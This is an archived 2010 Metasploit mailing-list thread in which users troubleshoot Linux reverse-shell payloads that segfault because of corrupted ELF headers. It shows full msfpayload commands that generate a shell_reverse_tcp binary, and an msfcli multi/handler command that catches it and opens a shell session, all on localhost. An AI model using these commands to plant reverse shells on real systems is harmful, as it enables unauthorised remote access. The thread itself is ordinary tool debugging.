Home page logo
/

metasploit logo Metasploit mailing list archives

Re: Linux payloads broken
From: Florian Roth <Neo.X () web de>
Date: Fri, 07 May 2010 18:05:18 +0200


It seems to me that Ramon is right.

I get the same segmentation fault message and the kernel as the OS is
similar to yours. BUT - with a listening handler - everything works out
fine.

--- Term 1
neo () ubuntu:/hack/framework3$ ./msfpayload linux/x86/shell_reverse_tcp
LHOST=127.0.0.1 LPORT=80 X >out.elf
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
 Length: 71
Options: LHOST=127.0.0.1,LPORT=80
neo () ubuntu:/hack/framework3$ ./out.elf 
Segmentation fault
neo () ubuntu:/hack/framework3$ file out.elf 
out.elf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
statically linked, corrupted section header size
neo () ubuntu:/hack/framework3$ uname -a
Linux ubuntu 2.6.32-22-generic #33-Ubuntu SMP Wed Apr 28 13:27:30 UTC
2010 i686 GNU/Linux

--- Term 2

neo () ubuntu:/hack/framework3$ sudo ./msfcli exploit/multi/handler
PAYLOAD=linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=80 E
[sudo] password for neo: 
[*] Please wait while we load the module tree...

--- Term 1

neo () ubuntu:/hack/framework3$ ./out.elf

--- Term 2

[*] Started reverse handler on 127.0.0.1:80 
[*] Starting the payload handler...
[*] Command shell session 1 opened (127.0.0.1:80 -> 127.0.0.1:49928)


----------------
I used 
svn r9101 updated 20 days ago (2010.04.17)


So please check again if the handler is set right and nothing interferes
with the reverse connect. 

Best,

Florian

On Fri, 2010-05-07 at 18:00 +0300, Konrads Smelkovs wrote:
Strace shows that it segfaults before any syscalls are placed.
furthermore, it appears that exec headers are corrupt. wether I have
listener or not on the other end doesn't matter.

--
Konrads Smelkovs
Applied IT sorcery.


On Fri, May 7, 2010 at 3:53 PM, Ramon de Carvalho Valle
<ramon () metasploit com> wrote:
        Did you set a listener on the selected port?
        
        -Ramon
        
        
        
        On 05/07/2010 05:21 AM, Konrads Smelkovs wrote:
        > konrads () konrads-laptop:~/msf2$ ./msfpayload
        linux/x86/shell_reverse_tcp
        > LHOST=127.0.0.1 LPORT=80 X >out.elf
        > Created by msfpayload (http://www.metasploit.com).
        > Payload: linux/x86/shell_reverse_tcp
        >  Length: 71
        > Options: LHOST=127.0.0.1,LPORT=80
        > konrads () konrads-laptop:~/msf2$ file out.elf
        > out.elf: ELF 32-bit LSB executable, Intel 80386, version 1
        (SYSV),
        > statically linked, *corrupted section header size*
        > konrads () konrads-laptop:~/msf2$ chmod +x out.elf
        > konrads () konrads-laptop:~/msf2$ ./out.elf
        > *Segmentation fault*
        > konrads () konrads-laptop:~/msf2$ uname -a
        > Linux konrads-laptop 2.6.31-20-generic #58-Ubuntu SMP Fri
        Mar 12 05:23:09
        > UTC 2010 i686 GNU/Linux
        >
        >
        > Same for metsvc_reverse_tcp payload
        > --
        > Konrads Smelkovs
        > Applied IT sorcery.
        >
        >
        >
        >
        
        > _______________________________________________
        > https://mail.metasploit.com/mailman/listinfo/framework
        _______________________________________________
        https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

-- 
Sincerely
Saludos cordiales
Mit freundlichen Grüßen
Florian Roth

Tel:    +49 06251 - 827 9402
Mobil:  +49 175 - 7240 363       
Fax:    +49 12125 - 11699510
eMail:  Florian.Roth () email de

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]